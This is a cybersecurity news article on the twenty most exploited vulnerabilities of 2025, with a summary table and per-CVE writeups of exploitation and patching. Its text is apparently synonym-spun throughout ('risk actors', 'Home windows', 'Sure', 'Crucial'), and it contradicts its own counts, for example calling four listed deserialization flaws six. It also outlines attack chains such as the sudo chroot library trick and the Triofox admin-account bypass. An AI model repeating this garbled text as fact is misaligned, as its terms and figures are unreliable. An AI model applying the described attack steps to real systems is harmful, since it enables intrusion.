Top 20 Most Exploited Vulnerabilities of 2025

The cybersecurity panorama of 2025 has been marked by an unprecedented surge in vulnerability exploitation, with risk actors leveraging important flaws throughout enterprise software program, cloud infrastructure, and industrial programs.

This complete evaluation examines the twenty most harmful exploited vulnerabilities of the yr, highlighting their technical particulars, exploitation strategies, and the pressing want for organizations to prioritize patching and protection methods.

These vulnerabilities signify a mixed CVSS severity ranking averaging 8.5, with two reaching the utmost rating of 10.0, underscoring the important nature of those safety flaws.

Desk Detailing Most Exploited Vulnerabilities of 2025

CVE IDVulnerability TitleCVSS v3.1 ScoreAffected ProductVulnerability TypeAuthentication RequiredActive ExploitationDisclosure DateCISA KEV StatusPrimary Assault VectorCVE-2025-55182React2Shell – React Server Elements RCE10.0 (Crucial)React Server Elements (Meta)Deserialization / Unauthenticated RCENo (Unauthenticated)Sure – Mesh Agent Malware, Cryptocurrency MinersDecember 3, 2025Added December 2025Network / Net ApplicationCVE-2025-62221Windows Cloud Information Mini Filter Driver Use-After-Free7.8 (Excessive)Home windows Cloud Information Mini Filter DriverUse-After-Free / Reminiscence CorruptionYes (Authenticated Native)Sure – Patch Tuesday December 2025December 9, 2025Added December 2025Local System AccessCVE-2025-6218WinRAR Path Traversal Distant Code Execution7.8 (Excessive)WinRAR 7.11 and earlierPath Traversal / Arbitrary File ExtractionNo (Unauthenticated – Archive File)Sure – APT-C-08, GOFFEE, Bitter GroupsMarch 2025 / June 2025 PatchAdded December 2025User Interplay (Archive File)CVE-2025-48633Android Framework Info DisclosureHigh (Not Specified)Android 13-16 FrameworkInformation Disclosure / Sandbox BypassNo (Malicious App)Sure – State Actors (Restricted Focused)December 2, 2025Added December 2025Mobile Software / Malicious AppCVE-2025-48572Android Framework Privilege EscalationHigh (Not Specified)Android 13-16 FrameworkPrivilege Escalation / Unauthorized ActivityNo (Malicious App)Sure – State Actors (Restricted Focused)December 2, 2025Added December 2025Mobile Software / Malicious AppCVE-2025-5777CitrixBleed 2 – Citrix NetScaler Reminiscence Disclosure9.3 (Crucial)Citrix NetScaler ADC/GatewayOut-of-Bounds Learn / Session HijackingNo (Unauthenticated)Sure – RansomHub, A number of Risk GroupsJune 17, 2025Added July 2025 (24-hr deadline)Community / VPN GatewayCVE-2025-48384Git Arbitrary File Write on Non-Home windows Systems8.0-8.1 (Excessive)Git on macOS and LinuxArbitrary File Write / Git Hook ExecutionNo (Unauthenticated – Repository Clone)Sure – Subtle Social EngineeringJuly 8, 2025Added August 2025Network / Git RepositoryCVE-2025-41244VMware Aria Instruments Native Privilege Escalation7.8 (Excessive)VMware Aria Operations, VMware ToolsUntrusted Search Path / LocalPrivEscYes (Native Person)Sure – State Actor UNC5174 (Chinese language APT)September 29, 2025State Actor Exploitation (Not KEV)Native System AccessCVE-2025-9242WatchGuard Firebox IKEv2 Out-of-Bounds Write9.3 (Crucial)WatchGuard Firebox (Fireware OS)Out-of-Bounds Write / Stack OverflowNo (Unauthenticated)Sure – Confirmed KEV ListingSeptember 17, 2025Added November 2025Network / VPN IKEv2 ProtocolCVE-2025-12480Gladinet Triofox Improper Entry Control9.1 (Crucial)Gladinet TriofoxImproper Entry Management / Authentication BypassNo (Unauthenticated)Sure – UNC6485 ClusterNovember 12, 2025 (Public)Added November 2025Network / HTTP AccessCVE-2025-62215Windows Kernel Race Situation Privilege Escalation7.0 (Excessive)Home windows Kernel (All Supported OS)Race Situation / Double Free Heap CorruptionYes (Authenticated Native)Sure – Confirmed KEV ListingNovember 11, 2025Added November 2025Local System AccessCVE-2025-4664Google Chrome Cross-Origin Information Leak8.8 (Excessive)Google Chrome < 136.0.7103.113Cross-Origin Information Leak / Referrer Coverage BypassNo (Unauthenticated – Person Interplay)Sure – Confirmed KEV ListingMay 14, 2025Added Might 2025Network / Net BrowserCVE-2025-59287Microsoft WSUS Deserialization Distant Code Execution9.8 (Crucial)Microsoft WSUS (Home windows Server Replace Providers)Unsafe Deserialization / Gadget Chain RCENo (Unauthenticated)Sure – Widespread Exploitation POCOctober 23, 2025 (Emergency Patch)Added October 2025Network / WSUS Port 8530/8531CVE-2025-32463Sudo Chroot Privilege Escalation9.3 (Crucial)Sudo 1.9.14-1.9.17Relative Path Traversal / Privilege EscalationYes (Native Person)Sure – Confirmed KEV ListingJune 2025Added October 2025Local System AccessCVE-2025-20333Cisco ASA/FTD Buffer Overflow Distant Code Execution9.9 (Crucial)Cisco ASA/FTDBuffer Overflow / VPN Authentication BypassYes (Authenticated VPN)Sure – ArcaneDoor (UAT4356) State SponsorSeptember 24, 2025Added September 2025 (Emergency Directive)Community / VPN AuthenticationCVE-2025-20362Cisco ASA/FTD Lacking Authorization Authentication Bypass6.5 (Medium)Cisco ASA/FTDMissing Authorization / Entry Management FlawNo (Unauthenticated)Sure – ArcaneDoor Chain with CVE-2025-20333September 24, 2025Added September 2025 (Emergency Directive)Community / Firewall ManagementCVE-2025-10585Google Chrome V8 Kind Confusion Distant Code Execution8.8 (Excessive)Google Chrome < 140.0.7339.185Type Confusion / Reminiscence Corruption RCENo (Unauthenticated – Person Interplay)Sure – Google TAG ConfirmedSeptember 16, 2025Added September 2025Network / Net BrowserCVE-2025-5086DELMIA Apriso Deserialization of Untrusted Information RCE9.0 (Crucial)DELMIA Apriso (2020-2025 Launch)Unsafe Deserialization / Gadget Chain RCENo (Unauthenticated)Sure – SANS ISC ObservedJune 2, 2025 (Patch), September 11 (KEV)Added September 2025Network / HTTP SOAP RequestCVE-2025-53690Sitecore ViewState Deserialization Distant Code Execution9.0 (Crucial)Sitecore Expertise Supervisor/PlatformViewState Deserialization / Gadget Chain RCENo (Unauthenticated – Recognized Machine Key)Sure – Mandiant Risk Protection ConfirmedSeptember 2, 2025Added September 2025Network / Net ApplicationCVE-2025-32433Erlang/OTP SSH Daemon Pre-Authentication RCE10.0 (Crucial)Erlang/OTP SSH DaemonSSH Protocol Parsing / Pre-Auth RCENo (Pre-Authentication)Sure – OT Setting TargetingApril 16, 2025Confirmed Energetic ExploitationNetwork / SSH Protocol

Most Exploited Vulnerabilities of 2025

CVE-2025-55182: React2Shell

Probably the most important vulnerability of 2025, CVE-2025-55182, dubbed “React2Shell,” represents a watershed second in internet software safety. Disclosed on December 3, 2025, by Meta, this unauthenticated distant code execution flaw in React Server Elements achieved the utmost CVSS rating of 10.0. The vulnerability stems from insecure deserialization throughout the React Server Elements (RSC) Flight protocol, the place the server processes RSC payloads with out sufficient validation.​

In response to Wiz Analysis, 39% of cloud environments include weak situations, making this one of the crucial widespread important vulnerabilities in latest historical past.

The flaw impacts React variations 19.0, 19.1.0, 19.1.1, and 19.2.0, in addition to downstream frameworks like Subsequent.js. Safety researchers confirmed that default configurations are weak, that means normal Subsequent.js purposes created with create-next-app could be exploited with none code adjustments by builders.​

Rapid7 validated working proof-of-concept exploits inside 48 hours of disclosure, and by December 8, 2025, exploitation makes an attempt have been detected on honeypots worldwide.

The exploitation methodology includes crafting malicious RSC payloads that set off server-side execution logic, permitting attackers to execute privileged JavaScript code with SYSTEM-level entry. Organizations noticed attackers deploying Mesh Agent malware and cryptocurrency miners through PowerShell instructions executed by the vulnerability.​

CVE-2025-32433: Erlang/OTP SSH Zero-Day Disaster

CVE-2025-32433 represents one other most severity vulnerability (CVSS 10.0) affecting the Erlang/OTP SSH daemon, disclosed on April 16, 2025. This pre-authentication distant code execution flaw permits attackers to execute arbitrary code with out finishing the SSH authentication course of, exploiting improper dealing with of SSH protocol messages in the course of the pre-authentication section.​

The vulnerability impacts Erlang/OTP variations 27.3.2 and earlier, 26.2.5.10 and earlier, 25.3.2.19 and earlier, and all variations from OTP 17.0 and older. Erlang/OTP is foundational know-how utilized by organizations together with Ericsson, Cisco, and WhatsApp, making this vulnerability notably harmful for telecommunications, messaging platforms, IoT infrastructure, and monetary providers.​

Palo Alto Networks reported that between Might 1 and Might 9, 2025, exploitation makes an attempt surged sharply, with 70% of noticed detections coming from firewalls safeguarding operational know-how environments. The assault methodology includes sending SSH_MSG_CHANNEL_OPEN messages earlier than authentication to provoke session channels, adopted by SSH_MSG_CHANNEL_REQUEST with malicious “exec” payloads. If the SSH daemon runs with elevated privileges comparable to root, profitable exploitation grants full system management.​

CVE-2025-59287: Microsoft WSUS Deserialization Vulnerability

Microsoft Home windows Server Replace Providers turned a main goal in 2025 by CVE-2025-59287, a important distant code execution vulnerability with a CVSS rating of 9.8. Disclosed with an out-of-band emergency patch on October 23, 2025, this flaw stems from unsafe deserialization of untrusted information within the WSUS service.​

The vulnerability permits unauthenticated attackers to ship crafted requests to WSUS endpoints on ports 8530 and 8531, reaching code execution with SYSTEM privileges. In response to Huntress and Unit 42, attackers exploited the flaw by concentrating on the GetCookie() endpoint and ReportingWebService, inflicting improper deserialization of AuthorizationCookie objects utilizing insecure BinaryFormatter and SoapFormatter.​

Preliminary exploitation was noticed within the wild with course of chains exhibiting wsusservice.exe and w3wp.exe spawning cmd.exe and powershell.exe to execute Base64-encoded reconnaissance instructions. Attackers collected data utilizing whoami, web consumer /area, and ipconfig /all instructions, exfiltrating information to distant webhook endpoints.

The vulnerability was added to CISA’s Recognized Exploited Vulnerabilities catalog instantly following disclosure, with a public proof-of-concept exploit accelerating widespread assaults.​

CVE-2025-62221: Home windows Cloud Information Driver Zero-Day

Microsoft’s December 2025 Patch Tuesday included fixes for CVE-2025-62221, a use-after-free elevation of privilege vulnerability within the Home windows Cloud Information Mini Filter Driver that was actively exploited as a zero-day. With a CVSS rating of seven.8, this vulnerability permits authenticated native attackers to escalate privileges to the SYSTEM stage with out consumer interplay.​

The flaw stems from a use-after-free situation the place a program makes an attempt to make use of a block of reminiscence that has already been returned to system management. CISA confirmed lively exploitation by including the vulnerability to its Recognized Exploited Vulnerabilities catalog on December 9, 2025, mandating Federal Civilian Govt Department companies to use updates by December 30, 2025.​

Safety researchers famous that the vulnerability is especially harmful as a result of it impacts the Cloud Information Mini Filter Driver, a core Home windows part managing cloud storage integration, current even when purposes like OneDrive, Google Drive, or iCloud aren’t put in.

The low assault complexity and minimal privilege necessities make exploitation accessible to many potential attackers, enabling risk actors to disable safety tooling, entry delicate data, transfer laterally throughout networks, and set up persistent high-privilege entry.​

CVE-2025-62215: Home windows Kernel Race Situation Zero-Day

November 2025’s Patch Tuesday addressed CVE-2025-62215, a race situation vulnerability within the Home windows Kernel with a CVSS rating of seven.0, actively exploited within the wild. The vulnerability, found by Microsoft Risk Intelligence Heart (MSTIC) and Microsoft Safety Response Heart (MSRC), permits authenticated attackers with low-level privileges to raise their entry to SYSTEM-level privileges.​

The race situation vulnerability includes concurrent execution utilizing shared assets with improper synchronization (CWE-362). Attackers exploit this by operating specifically crafted packages that repeatedly provoke timing errors, forcing a number of threads to entry the identical kernel useful resource with out correct synchronization. This confuses the kernel’s reminiscence dealing with, inflicting it to free the identical reminiscence block twice, a “double free” situation that corrupts the kernel heap and gives attackers a path to overwrite reminiscence and seize management of execution move.​

Safety consultants assess that CVE-2025-62215 is primarily getting used after preliminary compromise through phishing, RCE, or sandbox escape to raise privileges, harvest credentials, and transfer laterally. The vulnerability impacts all at present supported Home windows OS editions, together with Home windows 10, Home windows 11, Home windows Server 2019 by Home windows Server 2025, and Home windows 10 Prolonged Safety Updates (ESU). CISA set a remediation date of December 3, 2025, for federal companies.​

CVE-2025-48572 and CVE-2025-48633: Android Framework Zero-Days

Google’s December 2025 Android Safety Bulletin addressed over 100 vulnerabilities, together with two high-severity zero-days within the Android Framework that CISA added to its KEV catalog on December 2, 2025. CVE-2025-48572 is an elevation of privilege vulnerability permitting malicious apps to launch unauthorized actions from the background with out consumer interplay. CVE-2025-48633 is an data disclosure flaw enabling apps to entry delicate system reminiscence, probably bypassing Android’s sandboxing protections.​

Each vulnerabilities have an effect on Android variations 13 by 16 and have been confirmed underneath “restricted, focused exploitation” within the wild, seemingly by state actors or business surveillance instruments concentrating on high-value people. CVE-2025-48633 exists within the hasAccountsOnAnyUser technique of DevicePolicyManagerService.java, the place a logic error permits attackers so as to add a Machine Proprietor after provisioning, resulting in native escalation of privilege. CVE-2025-48572 stems from a permissions bypass within the Android Frameworks Base bundle, permitting unauthorized background exercise launches.​

Safety researchers word that these vulnerabilities are notably harmful when chained collectively, with CVE-2025-48633 used to exfiltrate delicate information or escape the applying sandbox, whereas CVE-2025-48572 is leveraged to realize system-level privileges. Federal companies have been mandated to use patches by December 23, 2025.​

CVE-2025-5777: CitrixBleed 2

CVE-2025-5777, dubbed “CitrixBleed 2” attributable to its similarities with the 2023 CitrixBleed vulnerability (CVE-2023-4966), represents a important out-of-bounds learn vulnerability in Citrix NetScaler ADC and Gateway with a CVSS rating of 9.3. Disclosed on June 17, 2025, and added to CISA’s KEV catalog on July 11 with an unprecedented 24-hour patching deadline, this vulnerability permits attackers to leak delicate reminiscence information, together with authentication tokens and session cookies.​

The vulnerability impacts NetScaler gadgets configured as Gateway (VPN digital server, ICA Proxy, CVPN, RDP Proxy) or AAA digital server. In response to safety researcher Kevin Beaumont, exploitation began way back to mid-June 2025, with one of many IP addresses linked to RansomHub ransomware exercise. GreyNoise information exhibits exploitation efforts originating from 10 distinctive malicious IP addresses positioned in Bulgaria, america, China, Egypt, and Finland over 30 days, primarily concentrating on america, France, Germany, India, and Italy.​

Attackers ship specifically crafted HTTP requests to weak Citrix home equipment, which reply with chunks of reminiscence containing session information. Utilizing leaked session tokens, attackers can hijack lively VPN periods, bypass multi-factor authentication, and entry inner programs with out credentials. Horizon3.ai researchers recognized suspicious adjustments within the nsppe binary (NetScaler Packet Parsing Engine) and found that configuration utilities directors use to handle NetScaler Gateway endpoints additionally make the most of weak reminiscence area, making session tokens belonging to the “nsroot” consumer weak to theft.​

CVE-2025-20333 and CVE-2025-20362: Cisco Firewall Exploitation Chain

Cisco Adaptive Safety Equipment (ASA) and Firepower Risk Protection (FTD) suffered from two important vulnerabilities exploited within the wild as zero-days earlier than patches turned accessible. CVE-2025-20333, with a CVSS rating of 9.9, is a buffer overflow vulnerability within the VPN internet server part, permitting authenticated attackers to execute arbitrary code as root. CVE-2025-20362, with a CVSS rating of 6.5, is a lacking authorization vulnerability enabling unauthenticated attackers to entry restricted URL endpoints.​

CISA issued Emergency Directive 25-03 on September 25, 2025, confirming lively exploitation and widespread scanning. The company attributed exploitation to the identical risk actor behind ArcaneDoor (UAT4356), a state-sponsored espionage marketing campaign first noticed in 2024. The U.Okay. Nationwide Cyber Safety Centre (NCSC) reported assaults delivering malware comparable to RayInitiator and LINE VIPER.​

The exploitation chain includes attackers utilizing CVE-2025-20362 to bypass authentication by crafted HTTP(S) requests, then chaining it with CVE-2025-20333 to realize root-level distant code execution. On November 5, 2025, Cisco warned of a brand new assault variant inflicting unpatched gadgets to unexpectedly reload, resulting in denial-of-service circumstances. The vulnerabilities have an effect on Cisco ASA variations 9.16–9.23 and Cisco FTD variations 7.0–7.7.​

CVE-2025-9242: WatchGuard Firebox Out-of-Bounds Disaster

WatchGuard Firebox firewalls confronted important exploitation by CVE-2025-9242, an out-of-bounds write vulnerability within the iked means of WatchGuard Fireware OS with a CVSS rating of 9.3. Disclosed on September 17, 2025, and added to CISA’s KEV catalog on November 12, 2025, this vulnerability permits distant unauthenticated attackers to execute arbitrary code.​

The vulnerability impacts each cell consumer VPN with IKEv2 and department workplace VPN utilizing IKEv2 when configured with a dynamic gateway peer. WatchTowr Labs researchers recognized the flaw as a stack-based buffer overflow in 2025, noting the dearth of recent exploit mitigations within the enterprise-grade equipment. The vulnerability impacts Fireware OS variations 11.10.2 by 11.12.4_Update1, 12.0 by 12.11.3, and 2025.1.​

Safety evaluation revealed suspicious adjustments inside /usr/bin/iked, particularly within the ike2_ProcessPayload_CERT operate the place lacking size validation permits attackers to overflow buffers with crafted IKEv2 packets. The unauthenticated portion of the IKE protocol consists of two preliminary packet exchanges, with the weak code processed throughout IKE_SA_AUTH, that means attackers want solely ship two packets to succeed in the weak code path.

As a result of assault potential contains disabling safety tooling, accessing delicate data, transferring laterally throughout networks, and establishing persistent high-privilege entry, organizations have been urged to prioritize patching exterior regular patch cycles.​

CVE-2025-6218: WinRAR Path Traversal Exploitation

WinRAR, one of the crucial well-liked file archiving utilities worldwide, suffered from CVE-2025-6218, a important path traversal vulnerability with a CVSS rating of seven.8 affecting variations 7.11 and earlier. Disclosed in March 2025 and patched in WinRAR 7.12 Beta 1 in June 2025, the vulnerability was added to CISA’s KEV catalog on December 10, 2025, following affirmation of lively exploitation by a number of risk teams.​

The vulnerability stems from improper path validation in WinRAR’s RARReadHeader and RARProcessFile routines, which fail to normalize or validate relative path parts like ‘../’ and ‘..’. Malicious archives containing crafted paths can extract recordsdata exterior the meant folder, comparable to inserting executables within the Home windows Startup folder for computerized execution upon login. The flaw is exploitable whether or not the archive entry’s saved path is absolute or relative.​

A number of risk actors have been noticed exploiting this vulnerability, together with GOFFEE (Paper Werewolf), Bitter (APT-C-08/Manlinghua), and Gamaredon. SecPod researchers documented a focused cyber-espionage marketing campaign attributed to APT-C-08, specializing in authorities organizations in South Asia, utilizing phishing emails with malicious RAR archives. The assault payload included a C# trojan designed to contact exterior servers for command-and-control, enabling keylogging, screenshot seize, RDP credential harvesting, and file exfiltration.​

CVE-2025-48384: Git Arbitrary File Write Vulnerability

The extensively used Git model management system confronted exploitation by CVE-2025-48384, a high-severity vulnerability (CVSS 8.0–8.1) affecting macOS and Linux installations, disclosed on July 8, 2025. CISA added this vulnerability to its KEV catalog on August 26, 2025, with a remediation deadline of September 15, 2025, after confirming lively exploitation.​

The vulnerability stems from Git’s inconsistent dealing with of carriage return characters when parsing configuration recordsdata and submodule paths. When studying a config worth, Git strips trailing carriage return and line feed (CRLF) characters, however when writing a config entry, values with a trailing CR should not quoted, inflicting the CR to be misplaced when the config is later learn. Attackers craft malicious .gitmodules recordsdata with submodule paths ending in carriage returns, and when repositories are recursively cloned through git clone –recursive, the trail parsing inconsistency permits arbitrary file writes to attacker-specified paths.​

CrowdStrike recognized lively exploitation combining subtle social engineering techniques with malicious Git repository cloning operations. The exploitation includes strategically inserting symlinks and leveraging carriage return confusion to write down malicious content material on to the Git submodule’s hooks listing, which Git routinely executes as a part of the traditional submodule checkout course of. DataDog researchers famous that the vulnerability may be abused to overwrite victims’ Git configuration recordsdata, exfiltrating mental property comparable to proprietary supply code to attacker servers transparently.​

CVE-2025-12480: Gladinet Triofox Improper Entry Management

Gladinet Triofox, an on-premises and hybrid file-sharing platform extensively utilized by managed service suppliers and enterprises, suffered from CVE-2025-12480, an improper entry management vulnerability with a CVSS rating of 9.1. Whereas Gladinet patched the flaw on July 26, 2025, in model 16.7.10368.56560, the vulnerability wasn’t publicly disclosed till November 12, 2025, when it was added to CISA’s KEV catalog following lively exploitation observations.​

Mandiant Risk Protection found that risk cluster UNC6485 exploited the flaw as early as August 24, 2025, practically a month after the patch was launched, however with out public CVE disclosure. The vulnerability permits attackers to abuse HTTP Host header validation to entry the administration/AdminDatabase.aspx setup workflow, create native administrative accounts with no credentials, after which configure the product’s anti-virus executable path to run malicious scripts.​

The exploitation chain concerned modifying the Host header area to bypass entry controls, efficiently accessing AdminAccount.aspx, which redirects to InitAccount.aspx for creating new admin accounts. As soon as authenticated with the newly created Admin account, attackers uploaded malicious recordsdata and executed them utilizing the built-in anti-virus function, with the configured anti-virus path inheriting Triofox guardian course of privileges and operating underneath the SYSTEM account context. Noticed assault exercise included deploying PLINK to tunnel RDP externally and downloading recordsdata to staging directories like C:WINDOWSTemp.​

CVE-2025-32463: Sudo Privilege Escalation through Chroot

A important vulnerability (CVSS 9.3) was found in Sudo variations 1.9.14 by 1.9.17, reported by Wealthy Mirch from Stratascale Cyber Analysis Unit in June 2025. CVE-2025-32463 permits native customers to acquire root entry by exploiting the –chroot possibility, the place /and so forth/nsswitch.conf from a user-controlled listing is used.​

The vulnerability stems from a change launched in sudo 1.9.14 that allowed path decision through chroot() utilizing a user-specified root listing whereas the sudoers file was nonetheless being evaluated. An attacker might put together a writable listing (for instance underneath /tmp), place a pretend /and so forth/nsswitch.conf and a malicious libnss_*.so library there, then invoke sudo with the –chroot possibility, inflicting sudo to load the attacker’s code with root privileges.​

Main Linux distributions, together with Ubuntu, Crimson Hat, SUSE, and Debian, issued safety advisories and patches. The vulnerability was mounted in sudo model 1.9.17p1, reverting the change from sudo 1.9.14 and marking the chroot function as deprecated. CISA added the vulnerability to its KEV catalog in October 2025, emphasizing the severity for enterprise Linux environments.​

CVE-2025-4664: Chrome Cross-Origin Information Leak

Google Chrome was exploited through CVE-2025-4664, a high-severity vulnerability (CVSS 8.8) affecting variations previous to 136.0.7103.113, which was disclosed and patched on Might 14, 2025. CISA added the vulnerability to its KEV catalog on Might 15, 2025, with a remediation due date of June 5, 2025, confirming lively exploitation.​

The vulnerability stems from inadequate coverage enforcement within the Chrome Loader part, permitting distant attackers to leak cross-origin information by crafted HTML pages. The problem lies in how Chrome handles the Hyperlink HTTP header on sub-resource requests comparable to pictures and scripts, honoring the referrer-policy directive even on sub-resources conduct not shared by different main browsers. Attackers can abuse this header by setting a looser coverage like unsafe-url, inflicting Chrome to leak full referrer URLs together with delicate tokens or credentials to third-party domains.​

Safety researcher Vsevolod Kokorin (“slonser_”) famous that the Hyperlink header can set a referrer-policy with unsafe-url specification, capturing full question parameters that may include delicate information. In OAuth flows, this would possibly result in account takeover, as builders not often contemplate the potential of stealing question parameters through a picture from a third-party useful resource. The vulnerability required consumer interplay (opening malicious HTML pages), however that step is comparatively simple to realize by phishing or compromised web sites.​

CVE-2025-10585: Chrome V8 Kind Confusion Zero-Day

Google launched emergency safety updates in September 2025 to deal with CVE-2025-10585, an actively exploited sort confusion vulnerability within the V8 JavaScript and WebAssembly engine. Found and reported by Google’s Risk Evaluation Group (TAG) on September 16, 2025, the vulnerability achieved a high-severity ranking and was confirmed underneath lively exploitation.​

Kind confusion vulnerabilities happen when Chrome doesn’t confirm the article sort it’s dealing with and makes use of it incorrectly, mistaking one sort of knowledge for an additional, like treating an inventory as a single worth or a quantity as textual content. This could trigger unpredictable conduct and permit attackers to control reminiscence and run code remotely by crafted JavaScript on malicious or compromised web sites. The vulnerability impacts Chrome variations previous to 140.0.7339.185/.186 on Home windows/macOS and 140.0.7339.185 on Linux.​

CVE-2025-10585 represents the sixth Chrome zero-day publicly tied to lively exploitation in 2025, following CVE-2025-2783, CVE-2025-4664, CVE-2025-5419, CVE-2025-6554, and CVE-2025-6558. Safety researchers emphasised that sort confusion bugs in V8 are notably highly effective, as tricking the engine into misinterpreting reminiscence structure permits attackers to deprave reminiscence, crash the browser, or acquire code execution on the host, all simply by getting customers to load malicious pages or content material. As a result of proof-of-concept exploits have been accessible, unpatched programs confronted instant threat from widespread exploitation makes an attempt.​

CVE-2025-5086: DELMIA Apriso Deserialization Disaster

Dassault Systèmes’ DELMIA Apriso manufacturing operations administration platform suffered from CVE-2025-5086, a important deserialization of untrusted information vulnerability with a CVSS rating of 9.0. The vulnerability impacts DELMIA Apriso variations from Launch 2020 by Launch 2025 and was patched on June 2, 2025, however not earlier than lively exploitation started.​

CISA added the vulnerability to its KEV catalog on September 11, 2025, after the SANS Web Storm Heart reported observing real-world exploitation makes an attempt on September 3, 2025. The vulnerability permits distant, unauthenticated attackers to execute arbitrary code with out authentication by malicious SOAP/HTTP requests to weak endpoints. Safety researcher Johannes Ullrich noticed assaults originating from IP handle 156.244.33[.]162, with payloads consisting of Base64-encoded, GZIP-compressed .NET executables embedded inside XML.​

The malicious payload has been recognized as a Home windows executable categorised by researchers as “Trojan.MSIL.Zapchast.gen,” a program designed for cyber espionage actions together with keylogging, screenshot seize, and gathering lively software lists. DELMIA Apriso is utilized in manufacturing processes for digitalization and monitoring, with widespread deployment in automotive, aerospace, electronics, high-tech, and industrial equipment sectors, supporting features together with manufacturing scheduling, high quality administration, useful resource allocation, and warehouse administration. The exploitation represents a big risk to operational know-how environments and manufacturing important infrastructure.​

CVE-2025-41244: VMware Privilege Escalation by State Actors

VMware Aria Operations and VMware Instruments contained CVE-2025-41244, an area privilege escalation vulnerability with a CVSS rating of seven.8 that was exploited by state-linked actors earlier than public disclosure. The vulnerability was disclosed on September 29, 2025, however NVISO researchers confirmed that subtle Chinese language state-sponsored risk actor UNC5174 had been covertly leveraging the flaw since not less than mid-October 2024.​

The vulnerability impacts programs with VMware Instruments put in and managed by Aria Operations with Service Discovery Administration Pack (SDMP) enabled, permitting malicious native actors with non-administrative privileges to escalate privileges to root on the identical VM. The flaw exists within the service discovery function throughout the get-versions.sh shell script’s get_version operate, which makes use of broad-matching common expressions that may match non-system binaries in user-writable directories, resulting in untrusted search path vulnerabilities (CWE-426).​

When efficiently exploited, attackers acquire elevated privileges, enabling full management over affected programs. The vulnerability impacts VMware Aria Operations variations prior to eight.18.5, VMware Cloud Basis Operations variations previous to 9.0.1.0, and VMware Instruments variations previous to 13.0.5.0, 13.0.5, and 12.5.4. Broadcom’s failure to reveal lively exploitation on the time of the advisory drew criticism from the cybersecurity group, with researchers emphasizing that organizations have been left unaware of the real-world risk stage.​

CVE-2025-53690: Sitecore Deserialization Assaults

Sitecore Expertise Supervisor (XM) and Expertise Platform (XP) confronted important exploitation by CVE-2025-53690, a deserialization of untrusted information vulnerability (CVSS 9.0) affecting variations by 9.0. Mandiant Risk Protection found lively ViewState deserialization assaults leveraging a pattern machine key that had been uncovered in Sitecore deployment guides from 2017 and earlier.​

The vulnerability impacts clients who deployed any model of a number of Sitecore merchandise utilizing the pattern key uncovered in publicly accessible deployment guides, particularly Sitecore XP 9.0 and Energetic Listing 1.4 and earlier variations. Sitecore confirmed that up to date deployments routinely generate distinctive machine keys and notified affected clients. The vulnerability allows attackers to inject and execute arbitrary code by exploiting insecure deserialization of untrusted information.​

Preliminary compromise was achieved by exploiting the ViewState Deserialization vulnerability on affected internet-facing Sitecore situations, leading to distant code execution. A decrypted ViewState payload contained WEEPSTEEL malware designed for inner reconnaissance. Following profitable exploitation, risk actors archived the basis listing of the net software to acquire delicate recordsdata comparable to internet.config, deployed EARTHWORM community tunnel instruments, DWAGENT distant entry instruments, and SHARPHOUND Energetic Listing reconnaissance instruments. The attackers created native administrator accounts, dumped SAM/SYSTEM registry hives to compromise cached administrator credentials, and enabled lateral motion through RDP.​

The twenty most exploited vulnerabilities of 2025 show the evolving sophistication of risk actors and the persistent challenges organizations face in securing trendy IT infrastructure. With a mean CVSS rating of 8.5 and a number of vulnerabilities reaching the utmost severity ranking of 10.0, these flaws signify important dangers to enterprise safety posture.

A number of key developments emerge from this evaluation. First, deserialization vulnerabilities proceed to plague enterprise purposes, accounting for six of the twenty most exploited flaws (CVE-2025-55182, CVE-2025-59287, CVE-2025-5086, CVE-2025-53690).

Second, privilege escalation vulnerabilities concentrating on working system kernels and drivers stay enticing to attackers searching for to ascertain persistent entry (CVE-2025-62221, CVE-2025-62215, CVE-2025-48572, CVE-2025-48633, CVE-2025-41244, CVE-2025-32463).

Third, community infrastructure gadgets, together with firewalls, VPNs, and gateways, face persistent concentrating on by state-sponsored actors (CVE-2025-5777, CVE-2025-20333, CVE-2025-20362, CVE-2025-9242).​

Organizations should undertake a multi-layered protection technique, prioritizing a number of key actions. Speedy patching of programs uncovered to the web or dealing with untrusted information ought to be the very best precedence, notably for max severity vulnerabilities like CVE-2025-55182 and CVE-2025-32433.

Implementation of community segmentation to isolate important programs and restrict lateral motion alternatives is crucial, particularly for operational know-how environments weak to CVE-2025-5086 and CVE-2025-41244. Enhanced monitoring and logging to detect exploitation makes an attempt, notably for deserialization assaults and privilege escalation behaviors, gives important early warning capabilities.​

Federal companies should adjust to CISA KEV catalog deadlines, with all twenty vulnerabilities both already added to the catalog or confirmed underneath lively exploitation. Personal sector organizations ought to deal with KEV additions as pressing safety priorities requiring accelerated patch deployment exterior regular upkeep home windows.

The speedy exploitation timelines noticed in 2025, with proof-of-concept exploits showing inside hours of disclosure for CVE-2025-55182 and CVE-2025-48384, underscore the important significance of proactive safety postures and ready incident response capabilities.​

Because the cybersecurity panorama continues to evolve, organizations should acknowledge that vulnerability administration is just not merely a technical problem however a strategic crucial requiring government consideration, sufficient useful resource allocation, and steady vigilance.

The exploitation developments noticed in 2025 will seemingly proceed into 2026, with risk actors more and more concentrating on provide chain dependencies, cloud infrastructure, and operational know-how programs. Solely by complete defense-in-depth methods, well timed patching, and steady monitoring can organizations hope to mitigate the dangers posed by these important vulnerabilities.

Observe us on Google Information, LinkedIn, and X for day by day cybersecurity updates. Contact us to function your tales.